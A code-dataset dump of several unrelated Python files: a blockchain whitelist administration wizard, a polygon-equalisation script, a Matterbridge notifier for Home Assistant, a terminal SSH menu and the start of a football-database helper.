w3.eth.blockNumber > last_block:\n print(\"\\nChecks are ok.\\n\")\n\n\ndef read_config_files():\n if (not os.path.isfile(\"../templates/whitelist_abi.json\")) | (not os.path.isfile(\"out/masterchain-config.json\")):\n print(\"Unable to read abi & config files\")\n sys.exit(-1)\n\n globals()['json_abi'] = json.load(open(\"../templates/whitelist_abi.json\", \"r\"))\n masterchain_config = json.load(open(\"out/masterchain-config.json\", \"r\"))\n globals()['whitelist'] = masterchain_config['whitelist']\n globals()['admin'] = masterchain_config['admin']\n globals()['authority'] = masterchain_config['authority']\n globals()['signBlockAddress'] = masterchain_config['signBlockAddress']\n globals()['serverAddress'] = masterchain_config['serverAddress']\n globals()['clientAddress'] = masterchain_config['clientAddress']\n\n\ndef test_whitelist():\n whitelist = w3.eth.contract(abi=globals()['json_abi'], address=Web3.toChecksumAddress(globals()['whitelist']))\n try:\n print(\"Whitelist signBlockAddress: \" + whitelist.functions.rootNode().call())\n print(\"Whitelist authority: \" + whitelist.functions.authority().call())\n except FileNotFoundError:\n print(\"{} file not available. Check your node is running.\".format(globals()['meth_ipc_path']))\n sys.exit(-1)\n\n\ndef is_node_activated():\n whitelist = w3.eth.contract(abi=globals()['json_abi'], address=Web3.toChecksumAddress(globals()['whitelist']))\n return not whitelist.functions.rootNodeAllowed().call()\n\n\ndef user_dialog():\n print(\"\\nAvailable actions: \")\n print(\"1. Add admin\")\n print(\"2. Register rootnode addresses\")\n print(\"3. Register node server/client addresses\")\n print(\"4. Register node signer address\")\n print(\"5. Ban node server/client address\")\n print(\"6. Ban node signer address\")\n print(\"8. Check node activated\")\n print(\"9. Exit\")\n user_choice = input(\"Please choose the action: \")\n if user_choice == '1':\n add_admin_transaction()\n elif user_choice == '2':\n register_root_addresses()\n elif user_choice == '3':\n register_reader_node_addresses()\n elif user_choice == '4':\n register_signer_node_addresses()\n elif user_choice == '5':\n ban_reader_node_addresses()\n elif user_choice == '6':\n ban_signer_node_addresses()\n # elif user_choice == '3':\n # send_signed_transactions()\n elif user_choice == '8':\n print(\"Node address activated? {}\".format(is_node_activated()))\n return user_dialog()\n elif user_choice == '9':\n sys.exit(0)\n else:\n return user_dialog()\n\n\ndef enter_address_dialog(address_type):\n address = input(\"Please input the \" + str(address_type) + \" address with 0x prefix: \")\n if len(address) != 42:\n print(\"Wrong length.\")\n return enter_address_dialog(address_type)\n elif address[0:2] != \"0x\":\n print(\"Bad prefix.\")\n return enter_address_dialog(address_type)\n return address\n\n\ndef enter_mask_dialog():\n mask = int(input(\"Enter address mask: 1 (read), 2 (mine) or 3 (read/mine): \"))\n if mask != 1 | mask != 2 | mask != 3:\n print(\"Bad mask entered. You can only use 1, 2 or 3.\")\n return enter_mask_dialog()\n return mask\n\n\ndef unlock_account(account, account_type):\n pwd = getpass.getpass(\"Enter {} {} account password: \".format(account, account_type))\n try:\n w3.personal.unlockAccount(Web3.toChecksumAddress(account), pwd, 30)\n except ValueError as ex:\n print(\"Error: {}\".format(ex))\n return False\n else:\n return True\n\n\ndef add_admin_transaction():\n if is_node_activated():\n print(\"Whitelist activated. You are free to add any account as admin. \"\n \"Wizard will ask you new admin address and reference below.\\n\")\n admin_address = enter_address_dialog(\"admin\")\n admin_reference = input(\"Enter new admin reference. It can be any string: \")\n else:\n print(\"Whitelist is not activated. You only can add admin that set in masterchain-config.json\")\n admin_address = globals()['admin']\n admin_reference = \"firstAdmin\"\n\n whitelist = w3.eth.contract(abi=globals()['json_abi'], address=Web3.toChecksumAddress(globals()['whitelist']))\n authority_account = whitelist.functions.authority().call()\n new_gas_price = w3.eth.gasPrice + 100\n nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(authority_account))\n\n add_admin_data = whitelist.encodeABI(fn_name='addAdmin',\n args=[Web3.toChecksumAddress(admin_address), admin_reference])\n add_admin = {'data': add_admin_data, 'from': Web3.toChecksumAddress(authority_account),\n 'to': Web3.toChecksumAddress(globals()['whitelist']),\n 'gas': 4700000, 'gasPrice': new_gas_price, 'nonce': nonce}\n admin_check = w3.eth.call(add_admin)\n\n if not admin_check:\n print(\"Test call returned False. Unable to add admin {}, {}\".format(admin_address, admin_reference))\n return user_dialog()\n # unlock authority\n unlock_result = unlock_account(authority_account, \"AUTHORITY\")\n if not unlock_result:\n print(\"Unable to unlock account. Returning.\")\n return user_dialog()\n\n # send transaction\n print(\"Sending transaction...\")\n admin_transact = w3.eth.sendTransaction(add_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(admin_transact, 300)['status']))\n user_dialog()\n\n\ndef ban_reader_node_addresses():\n activated = is_node_activated()\n if activated:\n print(\"Whitelist is activated. You are changing mask for node server/client addresses. \\n\"\n \"Wizard will ask you new mask and node server and client addresses.\\n\"\n \"You will be asked about admin account.\\n\")\n\n new_mask = 0\n node_server_address = enter_address_dialog(\"node server\")\n node_client_address = enter_address_dialog(\"node client\")\n current_admin = enter_address_dialog(\"admin\")\n\n # unlock admin\n unlock_result = unlock_account(current_admin, \"ADMIN\")\n if not unlock_result:\n print(\"Unable to unlock account. Returning.\")\n return user_dialog()\n\n stat1 = change_mask_transaction(node_server_address, new_mask, current_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(stat1, 300)['status']))\n stat2 = change_mask_transaction(node_client_address, new_mask, current_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(stat2, 300)['status']))\n else:\n print(\"Whitelist is not activated. Select action 2 (Register rootnode addresses).\")\n\n user_dialog()\n\n\ndef ban_signer_node_addresses():\n activated = is_node_activated()\n if activated:\n print(\"Whitelist is activated. You are changing mask for signing node address.\\n\"\n \"Wizard will ask you new mask and node signer address.\\n\"\n \"You will be asked about admin account.\\n\")\n\n new_mask = 0\n node_sign_address = enter_address_dialog(\"node signer\")\n current_admin = enter_address_dialog(\"admin\")\n\n # unlock admin\n unlock_result = unlock_account(current_admin, \"ADMIN\")\n if not unlock_result:\n print(\"Unable to unlock account. Returning.\")\n return user_dialog()\n\n stat1 = change_mask_transaction(node_sign_address, new_mask, current_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(stat1, 300)['status']))\n else:\n print(\"Whitelist is not activated. Select action 2 (Register rootnode addresses).\")\n\n user_dialog()\n\n\ndef register_reader_node_addresses():\n activated = is_node_activated()\n if activated:\n print(\"Whitelist is activated. You are adding node server/client adresses. \\n\"\n \"Wizard will ask you new node server and client addresses and reference below.\\n\"\n \"You will ne asked about admin account.\\n\")\n\n node_server_address = enter_address_dialog(\"node server\")\n node_client_address = enter_address_dialog(\"node client\")\n node_reference = input(\"Enter new node reference. It can be any string: \")\n node_read_mask = 1\n\n current_admin = enter_address_dialog(\"admin\")\n # unlock admin\n unlock_result = unlock_account(current_admin, \"ADMIN\")\n if not unlock_result:\n print(\"Unable to unlock account. Returning.\")\n return user_dialog()\n\n stat1 = register_transaction(node_server_address, node_read_mask, node_reference, current_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(stat1, 300)['status']))\n stat2 = register_transaction(node_client_address, node_read_mask, node_reference, current_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(stat2, 300)['status']))\n else:\n print(\"Whitelist is not activated. Select action 2 (Register rootnode addresses).\")\n\n user_dialog()\n\n\ndef register_signer_node_addresses():\n activated = is_node_activated()\n if activated:\n print(\"Whitelist is activated. You are adding signing node address.\\n\"\n \"Wizard will ask you new node signer address and reference below.\\n\"\n \"You will be asked about admin account.\\n\")\n\n node_sign_address = enter_address_dialog(\"node signer\")\n node_sign_reference = input(\"Enter new node reference. It can be any string: \")\n node_sign_mask = 2\n\n current_admin = enter_address_dialog(\"admin\")\n\n # unlock admin\n unlock_result = unlock_account(current_admin, \"ADMIN\")\n if not unlock_result:\n print(\"Unable to unlock account. Returning.\")\n return user_dialog()\n\n stat1 = register_transaction(node_sign_address, node_sign_mask, node_sign_reference, current_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(stat1, 300)['status']))\n else:\n print(\"Whitelist is not activated. Select action 2 (Register rootnode addresses).\")\n\n user_dialog()\n\n\ndef register_root_addresses():\n activated = is_node_activated()\n if activated:\n print(\"You are trying to add rootnode addresses with activated whitelist.\\n\"\n \"Action aborted.\\n\")\n else:\n print(\"Whitelist is not activated. Rootnode addresses:\\n\"\n \"signBlockAddress, serverAddress and clientAddress from masterchain-config.json will be added\")\n\n sign_address = globals()['signBlockAddress']\n server_address = globals()['serverAddress']\n client_address = globals()['clientAddress']\n sign_mask = 2\n read_mask = 1\n reference = \"Root node\"\n\n current_admin = globals()['admin']\n # unlock admin\n unlock_result = unlock_account(current_admin, \"ADMIN\")\n if not unlock_result:\n print(\"Unable to unlock account. Returning.\")\n return user_dialog()\n\n status = register_full_transaction(sign_address, server_address, client_address,\n sign_mask, read_mask, reference, current_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(status, 300)['status']))\n\n user_dialog()\n\n\ndef change_mask_transaction(new_node_address, new_node_mask, current_admin):\n whitelist = w3.eth.contract(abi=globals()['json_abi'], address=Web3.toChecksumAddress(globals()['whitelist']))\n\n admin_account_privileged = whitelist.functions.isAdmin(Web3.toChecksumAddress(current_admin)).call()\n if not admin_account_privileged:\n print(\"Account {} is not admin of whitelist. Returning.\".format(current_admin))\n return user_dialog()\n\n block_node_data = whitelist.encodeABI(fn_name='setMask',\n args=[Web3.toChecksumAddress(new_node_address), new_node_mask])\n new_gas_price = w3.eth.gasPrice + 1000\n nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(current_admin))\n register_node = {'data': block_node_data, 'to': Web3.toChecksumAddress(globals()['whitelist']),\n 'from': Web3.toChecksumAddress(current_admin), 'gas': 4700000, 'gasPrice': new_gas_price,\n 'nonce': nonce}\n register_node_check = w3.eth.call(register_node)\n if not register_node_check:\n print(\"Test call returned False. Unable to block node {}\".format(new_node_address))\n return user_dialog()\n\n # send transaction\n print(\"Sending transaction...\")\n register_transact = w3.eth.sendTransaction(register_node)\n return register_transact\n\n\ndef register_transaction(new_node_address, new_node_mask, new_node_reference, current_admin):\n whitelist = w3.eth.contract(abi=globals()['json_abi'], address=Web3.toChecksumAddress(globals()['whitelist']))\n\n admin_account_privileged = whitelist.functions.isAdmin(Web3.toChecksumAddress(current_admin)).call()\n if not admin_account_privileged:\n print(\"Account {} is not admin of whitelist. Returning.\".format(current_admin))\n return user_dialog()\n\n register_node_data = whitelist.encodeABI(fn_name='register',\n args=[Web3.toChecksumAddress(new_node_address), new_node_mask, new_node_reference])\n new_gas_price = w3.eth.gasPrice + 1000\n nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(current_admin))\n register_node = {'data': register_node_data, 'to': Web3.toChecksumAddress(globals()['whitelist']),\n 'from': Web3.toChecksumAddress(current_admin), 'gas': 4700000, 'gasPrice': new_gas_price,\n 'nonce': nonce}\n register_node_check = w3.eth.call(register_node)\n if not register_node_check:\n print(\"Test call returned False. Unable to register node {}, {}\".format(new_node_address, new_node_reference))\n return user_dialog()\n\n # send transaction\n print(\"Sending transaction...\")\n register_transact = w3.eth.sendTransaction(register_node)\n return register_transact\n\n\ndef register_full_transaction(signer_address, server_address, client_address, signer_mask, reader_mask,\n reference, current_admin):\n whitelist = w3.eth.contract(abi=globals()['json_abi'], address=Web3.toChecksumAddress(globals()['whitelist']))\n\n admin_account_privileged = whitelist.functions.isAdmin(Web3.toChecksumAddress(current_admin)).call()\n if not admin_account_privileged:\n print(\"Account {} is not admin of whitelist. Returning.\".format(current_admin))\n return user_dialog()\n\n register_node_data = whitelist.encodeABI(fn_name='registerFull',\n args=[Web3.toChecksumAddress(signer_address),\n Web3.toChecksumAddress(server_address),\n Web3.toChecksumAddress(client_address),\n signer_mask, reader_mask, reference])\n new_gas_price = w3.eth.gasPrice + 1000\n nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(current_admin))\n register_node = {'data': register_node_data, 'to': Web3.toChecksumAddress(globals()['whitelist']),\n 'from': Web3.toChecksumAddress(current_admin), 'gas': 4700000, 'gasPrice': new_gas_price,\n 'nonce': nonce}\n register_node_check = w3.eth.call(register_node)\n if not register_node_check:\n print(\"Test call returned False. Unable to register node:\\n\"\n \"{}, {}, {} - {}\".format(signer_address, server_address, client_address, reference))\n return user_dialog()\n\n # send transaction\n print(\"Sending transaction...\")\n register_transact = w3.eth.sendTransaction(register_node)\n return register_transact\n\n\ndef get_transaction_status(transaction_hash, timeout):\n try:\n txn_receipt = w3.eth.waitForTransactionReceipt(transaction_hash, timeout)\n except Exception:\n return {'status': 'failed', 'error': 'timeout'}\n else:\n return {'status': 'success', 'receipt': txn_receipt}\n\n\ndef main():\n welcome_message()\n read_config_files()\n init_vars()\n test_whitelist()\n check_status()\n user_dialog()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "KartelAG/stend-utils", "sub_path": "masterchain/whitelist-utils/common-setup/WhitelistManagement.py", "file_name": "WhitelistManagement.py", "file_ext": "py", "file_size_in_byte": 17753, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "web3.Web3", "line_number": 11, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 32, "usage_type": "call"}, {"api_name": "web3.IPCProvider", "line_number": 32, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 58, "usage_type": "call"}, {"api_name": "json.load", "line_number": 60, "usage_type": "call"}, {"api_name": "json.load", "line_number": 61, "usage_type": "call"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 71, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 71, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 77, "usage_type": "call"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 81, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 81, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 114, "usage_type": "call"}, {"api_name": "getpass.getpass", "line_number": 139, "usage_type": "call"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 141, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 141, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 160, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 160, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 163, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 163, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 166, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 166, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 167, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 167, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 168, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 168, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 328, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 328, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 330, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 330, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 336, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 336, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 338, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 338, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 339, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 339, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 340, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 340, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 354, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 354, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 356, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 356, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 362, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 362, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 364, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 364, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 365, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 365, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 366, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 366, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 381, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 381, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 383, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 383, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 389, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 389, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 390, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 390, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 391, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 391, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 394, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 394, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 395, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 395, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 396, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 396, "usage_type": "name"}]} +{"seq_id": "30150150502", "text": "\"\"\"Merge and/or split polygons so that their surface area closely matches the target figure.\n\nIf a polygon is larger than target_area and subdivisions are available,\nit is split into its subdivisions, which are reaggregated into compact shapes\nto match target_area. If a polygon is smaller than target_area, it is\naggregated with its neighbors.\nThe criterion being minimized is ``abs(1 - area / target_area)``.\n\nAn interface to ``mobilib.area.equalize_polygons``.\n\"\"\"\n\nimport geopandas as gpd\n\nimport mobilib.area\nimport mobilib.argparser\nimport mobilib.core\n\nparser = mobilib.argparser.default(__doc__, areas=True)\nparser.add_argument('-s', '--subdiv-file',\n help='areas to use as subdivisions of equalized areas as a GDAL-compatible polygon file'\n)\nparser.add_argument('-t', '--target-area', type=float,\n help='target area to approximate by the output polygons'\n)\nparser.add_argument('-p', '--subdiv-poly-id-col',\n help='column in the subdivisions file mapping to area IDs'\n)\nparser.add_argument('-u', '--unsafe-geom', action='store_true',\n help='the geometries of areas and subdivisions do not perfectly align, compensate for that'\n)\nparser.add_argument('out_file',\n help='path to output the GDAL-compatible polygon layer with areas equalized'\n)\n\nif __name__ == '__main__':\n args = parser.parse_args()\n areas = gpd.read_file(args.area_file).set_index(args.area_id_col)\n subdiv_geom = None\n subdiv_poly_ids = None\n if args.subdiv_file:\n subdivs = gpd.read_file(args.subdiv_file)\n subdiv_geom = subdivs.geometry\n if args.subdiv_poly_id_col:\n subdiv_poly_ids = subdivs[args.subdiv_poly_id_col]\n areas_eq, id_mapping = mobilib.area.equalize_polygons(\n areas.geometry,\n subdivisions=subdiv_geom,\n unsafe_geom=args.unsafe_geom,\n )\n mobilib.core.write_gdf(gpd.GeoDataFrame(geometry=areas_eq), args.out_file)\n", "repo_name": "simberaj/mobilib", "sub_path": "equalize_polygons.py", "file_name": "equalize_polygons.py", "file_ext": "py", "file_size_in_byte": 1896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "mobilib.area.argparser.default", "line_number": 18, "usage_type": "call"}, {"api_name": "mobilib.area.argparser", "line_number": 18, "usage_type": "attribute"}, {"api_name": "mobilib.area", "line_number": 18, "usage_type": "name"}, {"api_name": "geopandas.read_file", "line_number": 37, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 41, "usage_type": "call"}, {"api_name": "mobilib.area.area.equalize_polygons", "line_number": 45, "usage_type": "call"}, {"api_name": "mobilib.area.area", "line_number": 45, "usage_type": "attribute"}, {"api_name": "mobilib.area", "line_number": 45, "usage_type": "name"}, {"api_name": "mobilib.area.core.write_gdf", "line_number": 50, "usage_type": "call"}, {"api_name": "mobilib.area.core", "line_number": 50, "usage_type": "attribute"}, {"api_name": "mobilib.area", "line_number": 50, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "8973146845", "text": "import logging\r\nimport voluptuous as vol\r\nimport requests\r\nimport homeassistant.helpers.config_validation as cv\r\nfrom homeassistant.components.notify import (\r\n ATTR_TARGET, ATTR_TITLE, PLATFORM_SCHEMA, BaseNotificationService)\r\n\r\nCONF_URL = 'url'\r\nCONFIG_NICKNAME = 'nickname'\r\nCONFIG_TOKEN = 'token'\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\r\n vol.Required(CONF_URL): cv.string,\r\n vol.Required(CONFIG_NICKNAME): cv.string,\r\n vol.Optional(CONFIG_TOKEN): cv.string,\r\n}, extra=vol.ALLOW_EXTRA)\r\n\r\ndef get_service(hass, config, discovery_info=None):\r\n \"\"\"Get the custom notifier service.\"\"\"\r\n url = config.get(CONF_URL)\r\n nickname = config.get(CONFIG_NICKNAME)\r\n token = config.get(CONFIG_TOKEN)\r\n return MatterNotificationService(url,nickname,token)\r\n\r\nclass MatterNotificationService(BaseNotificationService):\r\n def __init__(self, url, nickname, token=None):\r\n self._url = url\r\n self.nickname = nickname\r\n self.token = token\r\n \r\n def send_message(self, message=\"\", **kwargs):\r\n title = kwargs.get(ATTR_TITLE)\r\n gateway = kwargs.get(ATTR_TARGET)\r\n \r\n data = {\r\n \r\n \"text\": \"*\" + title + \"* \\n\" + message,\r\n \"gateway\": str(gateway[0]),\r\n \"username\": self.nickname\r\n }\r\n try:\r\n if self.token is None:\r\n response = requests.post(self._url, json=data)\r\n else:\r\n headers = {\"Authorization\": \"Bearer \" + self.token} \r\n response = requests.post(self._url, json=data,headers = headers)\r\n _LOGGER.info(\"Message sent\")\r\n response.raise_for_status()\r\n except requests.exceptions.RequestException as ex:\r\n _LOGGER.error(\"Error sending notification using matterbridge: %s\", ex)", "repo_name": "t0mer/matterbridge-custom-notifier", "sub_path": "custom_components/matterbridge/notify.py", "file_name": "notify.py", "file_ext": "py", "file_size_in_byte": 1860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "homeassistant.components.notify.PLATFORM_SCHEMA", "line_number": 13, "usage_type": "name"}, {"api_name": "homeassistant.components.notify.PLATFORM_SCHEMA.extend", "line_number": 13, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 14, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 15, "usage_type": "call"}, {"api_name": "voluptuous.Optional", "line_number": 16, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 14, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 14, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 15, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 15, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 16, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 16, "usage_type": "name"}, {"api_name": "voluptuous.ALLOW_EXTRA", "line_number": 17, "usage_type": "attribute"}, {"api_name": "homeassistant.components.notify.BaseNotificationService", "line_number": 26, "usage_type": "name"}, {"api_name": "homeassistant.components.notify.ATTR_TITLE", "line_number": 33, "usage_type": "argument"}, {"api_name": "homeassistant.components.notify.ATTR_TARGET", "line_number": 34, "usage_type": "argument"}, {"api_name": "requests.post", "line_number": 44, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 50, "usage_type": "attribute"}]} +{"seq_id": "25057399378", "text": "import urwid\n\nfrom urwid import AttrMap, Text, Frame, Overlay, ExitMainLoop, ListBox, Button, \\\n Divider, Padding, SolidFill, GridFlow, Pile, Filler\n\nchoice = None\n\npalette = [\n ('header', 'bold', ''),\n ('footer', 'standout', ''),\n ('reversed', 'standout', ''),\n]\n\ndef start(config):\n \"\"\"Start the application and handle user input. Blocks until the application exits.\"\"\"\n\n def item_chosen(button, server):\n global choice\n choice = server\n response = Text([u'Connecting to: ', server.connection_string(), u'\\n'])\n done = Button(u'Ok')\n urwid.connect_signal(done, 'click', exit_program)\n main.original_widget = Filler(Pile([response, AttrMap(done, None, focus_map='reversed')]))\n\n def exit_program(button):\n raise urwid.ExitMainLoop()\n\n def unhandled(key):\n vim_map = {'h': 'left', 'j': 'down', 'k': 'up', 'l': 'right'}\n if key in vim_map.keys():\n list_box.keypress((0,1), vim_map[key])\n elif key in ['left', 'right']:\n pass\n elif key in ['esc', 'q']:\n raise ExitMainLoop()\n\n body = [urwid.Text(u'\\nServers'), Divider(u'-')]\n\n for server in config.get_servers():\n button = Button(server.name)\n urwid.connect_signal(button, 'click', item_chosen, server)\n body.append(AttrMap(button, None, focus_map='reversed'))\n\n list_box = ListBox(urwid.SimpleFocusListWalker(body))\n\n main = Padding(list_box, left=2, right=2)\n\n overlay = Overlay(main, SolidFill(u'\\N{MEDIUM SHADE}'),\n align='center', width=('relative', 60),\n valign='middle', height=('relative', 60),\n min_width=20, min_height=9)\n\n header = AttrMap(Text(u' ssh-menu'), 'header')\n footer = AttrMap(Text(u'this is the footer'), 'footer')\n\n frame = Frame(overlay, header=header, footer=footer)\n\n urwid.MainLoop(urwid.AttrMap(frame, 'body'), palette=palette, unhandled_input=unhandled).run()\n\n return choice\n", "repo_name": "acrisci/ssh-menu", "sub_path": "ssh-menu/application.py", "file_name": "application.py", "file_ext": "py", "file_size_in_byte": 1975, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "41", "api": [{"api_name": "urwid.Text", "line_number": 20, "usage_type": "call"}, {"api_name": "urwid.Button", "line_number": 21, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 22, "usage_type": "call"}, {"api_name": "urwid.Filler", "line_number": 23, "usage_type": "call"}, {"api_name": "urwid.Pile", "line_number": 23, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 23, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 26, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 35, "usage_type": "call"}, {"api_name": "urwid.Text", "line_number": 37, "usage_type": "call"}, {"api_name": "urwid.Divider", "line_number": 37, "usage_type": "call"}, {"api_name": "urwid.Button", "line_number": 40, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 41, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 42, "usage_type": "call"}, {"api_name": "urwid.ListBox", "line_number": 44, "usage_type": "call"}, {"api_name": "urwid.SimpleFocusListWalker", "line_number": 44, "usage_type": "call"}, {"api_name": "urwid.Padding", "line_number": 46, "usage_type": "call"}, {"api_name": "urwid.Overlay", "line_number": 48, "usage_type": "call"}, {"api_name": "urwid.SolidFill", "line_number": 48, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 53, "usage_type": "call"}, {"api_name": "urwid.Text", "line_number": 53, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 54, "usage_type": "call"}, {"api_name": "urwid.Text", "line_number": 54, "usage_type": "call"}, {"api_name": "urwid.Frame", "line_number": 56, "usage_type": "call"}, {"api_name": "urwid.MainLoop", "line_number": 58, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "14307535384", "text": "import pandas as pd\ndf_pw = pd.read_excel('C:/Users/tobia/OneDrive/Desktop/PW_File.xlsx')\npath = df_pw['Ordner_Test'].iloc[0]\n\n\nimport pandas as pd\nimport numpy as np\n\nfrom sqlalchemy import create_engine\nfrom numpy import array\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nimport Read_Load_Database as db\n\n\ndef get_pw_db():\n df_pw = pd.read_excel('D:/Projects/PW_File.xlsx')\n pw = df_pw['Database'].iloc[0]\n \n return pw\n\n\ndef delete(query):\n \n pw = get_pw_db()\n conn = create_engine('mysql+pymysql://root:'+pw+'@localhost/prod_football')\n conn.execute(query)\n\ndef execute(query):\n \n pw = get_pw_db()\n conn = create_engine('mysql+pymysql://root:'+pw+'@localhost/prod_football')\n conn.execute(query)\n\ndef connection(query):\n \n pw = get_pw_db()\n conn = create_engine('mysql+pymysql://root:'+pw+'@localhost/prod_football')\n df = pd.read_sql(query, con = conn) \n\n return df\n \ndef get_data(var):\n \n df = db.get_test_query('bl1_prod_full', 'bl1_data_ergebnisse_kategorisiert') \n df = df.sort_values(by = 'Date')\n print(\"Nbr of rows before drop nan :\")\n print(len(df))\n print(\" \")\n df = df.dropna()\n print(\"Nbr of rows after drop nan :\")\n print(\" \")\n print(len(df))\n X = df[var]\n y = df['Spiel_Ausgang']\n\n if (('Heimmannschaft_ID') in var) or (('Trainer_ID') in var) or 